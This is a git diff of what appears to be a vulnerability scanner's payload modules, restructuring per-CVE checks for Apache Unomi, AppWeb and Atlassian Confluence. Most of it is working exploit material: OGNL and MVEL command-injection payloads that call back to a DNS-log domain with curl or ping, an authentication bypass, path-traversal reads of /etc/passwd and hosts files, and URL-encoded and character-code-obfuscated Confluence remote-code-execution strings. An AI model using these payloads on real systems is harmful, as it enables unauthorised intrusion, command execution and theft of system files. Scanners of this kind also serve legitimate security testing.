-payload_ognl = '''{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"COMMANDDNSDOMAIN\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"sample"}'''
-
-cve_2020_13942_payloads = [
-    # ! MVEL表达式
-    {
-        'path': 'context.json',
-        'data': payload_mvel.replace('COMMAND', 'curl ')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_mvel.replace('COMMAND', 'curl http://')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_mvel.replace('COMMAND', 'ping -c 4 ')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_mvel.replace('COMMAND', 'ping ')
-    },
-    # ! OGNL表达式
-    {
-        'path': 'context.json',
-        'data': payload_ognl.replace('COMMAND', 'curl ')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_ognl.replace('COMMAND', 'curl http://')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_ognl.replace('COMMAND', 'ping -c 4 ')
-    },
-    {
-        'path': 'context.json',
-        'data': payload_ognl.replace('COMMAND', 'ping ')
-    },
-]
-
-def cve_2020_13942_scan(clients):
-    ''' 在Apache Unomi 1.5.1级以前版本中, 
-        存在一处表达式注入漏洞, 远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令
-    '''
-    client = clients.get('reqClient')
-    sessid = '69e506227812d37756fdf19a444de2b5'
-    
-    vul_info = {
-        'app_name': 'ApacheUnomi',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2020-13942',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2020_13942_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheUnomi/main.py b/payloads/ApacheUnomi/main.py
deleted file mode 100644
index bf90a93..0000000
--- a/payloads/ApacheUnomi/main.py
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Apache Unomi 是一个基于标准的客户数据平台(CDP, Customer Data Platform)
-用于管理在线客户和访客等信息, 以提供符合访客隐私规则的个性化体验
-    ApacheUnomi扫描类: 
-        Apache Unomi 远程表达式代码执行
-            CVE-2020-13942
-                Payload: https://vulhub.org/#/environments/unomi/CVE-2020-13942/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheUnomi.cve_2020_13942 import cve_2020_13942_scan
-
-class ApacheUnomi():
-    def __init__(self):
-        self.app_name = 'ApacheUnomi'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_13942_scan, clients=clients)
-        ]
-
-apacheunomi = ApacheUnomi()
diff --git a/payloads/AppWeb/appweb-cve-2018-8715-unauth.py b/payloads/AppWeb/appweb-cve-2018-8715-unauth.py
new file mode 100644
index 0000000..c010c63
--- /dev/null
+++ b/payloads/AppWeb/appweb-cve-2018-8715-unauth.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server
+他使用C/C++来编写, 能够运行在几乎先进所有流行的操作系统上
+当然他最主要的应用场景还是为嵌入式设备提供Web Application容器
+    AppWeb 身份认证绕过
+        CVE-2018-8715
+            Payload: https://vulhub.org/#/environments/appweb/CVE-2018-8715/
+
+其7.0.3之前的版本中, 有digest和form两种认证方式, 
+    如果用户传入的密码为null(也就是没有传递密码参数)
+    appweb将因为一个逻辑错误导致直接认证成功, 并返回session
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [                 # * 是不是很神奇, payload居然是空的
+            {'path': ''},
+            {'path': '/'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AppWeb',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'CVE-2018-8715',
+        }
+
+        headers = {
+            'Authorization': 'Digest username=admin'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res1 = client.request(
+                'get',
+                path,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            # if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)):
+            if (('Set-Cookie' in res1.headers)):
+                try:
+                    cookie = {
+                        'Cookie': res1.headers['Set-Cookie']
+                    }
+                    headers.update(cookie)
+                except KeyError:
+                    continue
+            
+                res2 = client.request(
+                    'get',
+                    path,
+                    headers=headers,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                if (('401' not in res2.text) 
+                    and (('<h1>Appweb &mdash; The Fast, Little Web Server</h1>' in res2.text) 
+                        or ('<a href="https://embedthis.com/appweb/doc/">documentation</a>' in res2.text) 
+                        or ('<h2>Appweb Resources and Useful Links</h2>' in res2.text) 
+                        or ('<a href="https://embedthis.com/appweb/download.html">https://embedthis.com/appweb/download.html</a>' in res2.text))
+                        or ('<a href="http://github.com/embedthis/appweb/issues">GitHub Appweb issue database</a>' in res2.text) 
+                        or ('All rights reserved. Embedthis and Appweb are trademarks of Embedthis Software LLC.' in res2.text) 
+                ):
+                    results = {
+                        'Target': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Cookie': cookie['Cookie'],
+                        'Request': res2
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AppWeb/cve_2018_8715.py b/payloads/AppWeb/cve_2018_8715.py
deleted file mode 100644
index c26b08a..0000000
--- a/payloads/AppWeb/cve_2018_8715.py
+++ /dev/null
@@ -1,75 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-# import re
-
-cve_2018_8715_payloads = [                 # * 是不是很神奇, payload居然是空的
-    {'path': ''},
-    {'path': '/'},
-]
-
-def cve_2018_8715_scan(clients):
-    ''' 其7.0.3之前的版本中, 有digest和form两种认证方式, 
-            如果用户传入的密码为null(也就是没有传递密码参数)
-            appweb将因为一个逻辑错误导致直接认证成功, 并返回session
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AppWeb',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'CVE-2018-8715',
-    }
-
-    headers = {
-        'Authorization': 'Digest username=admin'
-    }
-
-    for payload in cve_2018_8715_payloads:
-        path = payload['path']
-
-        res1 = client.request(
-            'get',
-            path,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        # if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)):
-        if (('Set-Cookie' in res1.headers)):
-            try:
-                cookie = {
-                    'Cookie': res1.headers['Set-Cookie']
-                }
-                headers.update(cookie)
-            except KeyError:
-                continue
-        
-            res2 = client.request(
-                'get',
-                path,
-                headers=headers,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            if (('401' not in res2.text) 
-                and (('<h1>Appweb &mdash; The Fast, Little Web Server</h1>' in res2.text) 
-                    or ('<a href="https://embedthis.com/appweb/doc/">documentation</a>' in res2.text) 
-                    or ('<h2>Appweb Resources and Useful Links</h2>' in res2.text) 
-                    or ('<a href="https://embedthis.com/appweb/download.html">https://embedthis.com/appweb/download.html</a>' in res2.text))
-                    or ('<a href="http://github.com/embedthis/appweb/issues">GitHub Appweb issue database</a>' in res2.text) 
-                    or ('All rights reserved. Embedthis and Appweb are trademarks of Embedthis Software LLC.' in res2.text) 
-            ):
-                results = {
-                    'Target': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Cookie': cookie['Cookie'],
-                    'Request': res2
-                }
-                return results
-    return None
diff --git a/payloads/AppWeb/main.py b/payloads/AppWeb/main.py
deleted file mode 100644
index d74df0c..0000000
--- a/payloads/AppWeb/main.py
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server
-        他使用C/C++来编写, 能够运行在几乎先进所有流行的操作系统上
-        当然他最主要的应用场景还是为嵌入式设备提供Web Application容器
-    AppWeb扫描类: 
-        AppWeb 身份认证绕过
-            CVE-2018-8715
-                Payload: https://vulhub.org/#/environments/appweb/CVE-2018-8715/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.AppWeb.cve_2018_8715 import cve_2018_8715_scan
-
-class AppWeb():
-    def __init__(self):
-        self.app_name = 'AppWeb'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_8715_scan, clients=clients)
-        ]
-
-appweb = AppWeb()
diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py
new file mode 100644
index 0000000..8b1866f
--- /dev/null
+++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py
@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Confluence任意文件包含
+    CVE-2015-8399
+        Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003
+
+Atlassian Confluence 5.8.17之前版本中存在安全, 
+    该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件
+    没有充分过滤'decoratorName'参数, 
+    远程攻击者可利用该漏洞读取配置文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
+            {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
+            {'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
+            {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
+            {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
+            {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AtlassianConfluence',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2015-8399',
+        }
+        
+        headers = {
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)                          # * /etc/passwd or hosts
+                or (('<?xml version="1.0" encoding="UTF-8"?>' in res.text)  # * web.xml
+                    and ('Confluence' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py
new file mode 100644
index 0000000..ffde4bf
--- /dev/null
+++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py
@@ -0,0 +1,88 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Confluence路径遍历和命令执行
+    CVE-2019-3396
+        Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/
+
+Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, 
+    攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件
+            #     'path': 'rest/tinymce/1/macro/preview',
+            #     'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + cmd + '}}}',
+            #     'headers': {'Content-Type': 'application/json; charset=utf-8'}
+            # },
+            {
+                'path': 'rest/tinymce/1/macro/preview',
+                'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}',
+            },
+            {
+                'path': 'rest/tinymce/1/macro/preview',
+                'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}',
+            },
+            {
+                'path': 'rest/tinymce/1/macro/preview',
+                'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}',
+            },
+            {
+                'path': 'rest/tinymce/1/macro/preview',
+                'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AtlassianConfluence',
+            # 'vul_type' = 'FileRead/RCE',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2019-3396',
+        }
+
+        headers = {
+            'Content-Type': 'application/json; charset=utf-8',
+            'Referer': client.protocol_domain
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+                # (check.check_res(res.text, self.md))
+            if (check.check_res_fileread(res.text)
+                or (('<?xml version="1.0" encoding="UTF-8"?>' in res.text) 
+                    and ('Confluence' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py
new file mode 100644
index 0000000..78c118d
--- /dev/null
+++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Confluence Server Webwork Pre-Auth OGNL表达式命令注入
+    CVE-2021-26084
+        Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/
+
+Confluence存在一个OGNL注入漏洞, 
+    允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码
+'''
+
+from lib.tool.md5 import random_int_2
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.random_num_1, self.random_num_2 = random_int_2()
+
+        self.payloads = [
+            {
+                'path': 'pages/doenterpagevariables.action',
+                'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027',
+            },
+            {
+                'path': 'pages/doenterpagevariables.action',
+                'data': 'queryString=%5cu0027%2b%7b{NUM1}*{NUM2}%7d%2b%5cu0027'.format(NUM1=self.random_num_1, NUM2=self.random_num_2),
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AtlassianConfluence',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2021-26084',
+        }
+        
+        headers = {
+            'Referer': client.protocol_domain
+        }
+
+        for payload in self.payloads:        
+            path = payload['path']
+            data = payload['data']
+            
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            random_num_sum = self.random_num_1 * self.random_num_2
+            if (check.check_res_fileread(res.text)
+                or (str(random_num_sum) in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py
new file mode 100644
index 0000000..b80db21
--- /dev/null
+++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Confluence远程代码执行
+    CVE-2022-26134
+        Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+        Payload-2: https://github.com/SNCKER/CVE-2022-26134
+
+2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, 
+    攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+import base64
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{RCECOMMAND}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'},
+            {'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search={RCECOMMAND}'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AtlassianConfluence',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2022-26134',
+        }
+        
+        headers = {
+            'Referer': client.protocol_domain
+        }
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo%20' + random_str
+            
+            path = payload['path'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            x_cmd_response = res.headers.get('X-Cmd-Response', '')
+            x_confluence = base64.b64decode(res.headers.get('X-Confluence', '')).decode()
+
+            if (check.check_res(x_cmd_response, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+            elif (check.check_res(x_confluence, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Response-Headers': 'X-Confluence: XXX',
+                    'Response-Decode': 'Base64',
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AtlassianConfluence/cve_2015_8399.py b/payloads/AtlassianConfluence/cve_2015_8399.py
deleted file mode 100644
index d5599c5..0000000
--- a/payloads/AtlassianConfluence/cve_2015_8399.py
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2015_8399_payloads = [
-    {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
-    {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
-    {'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
-    {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
-    {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'},
-    {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'},
-]
-
-def cve_2015_8399_scan(clients):
-    ''' Atlassian Confluence 5.8.17之前版本中存在安全, 
-        该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件
-        没有充分过滤'decoratorName'参数, 
-        远程攻击者可利用该漏洞读取配置文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AtlassianConfluence',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2015-8399',
-    }
-    
-    headers = {
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2015_8399_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)                          # * /etc/passwd or hosts
-            or (('<?xml version="1.0" encoding="UTF-8"?>' in res.text)  # * web.xml
-                and ('Confluence' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/AtlassianConfluence/cve_2019_3396.py b/payloads/AtlassianConfluence/cve_2019_3396.py
deleted file mode 100644
index 697395a..0000000
--- a/payloads/AtlassianConfluence/cve_2019_3396.py
+++ /dev/null
@@ -1,73 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2019_3396_payloads = [
-    # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件
-    #     'path': 'rest/tinymce/1/macro/preview',
-    #     'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + cmd + '}}}',
-    #     'headers': {'Content-Type': 'application/json; charset=utf-8'}
-    # },
-    {
-        'path': 'rest/tinymce/1/macro/preview',
-        'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}',
-    },
-    {
-        'path': 'rest/tinymce/1/macro/preview',
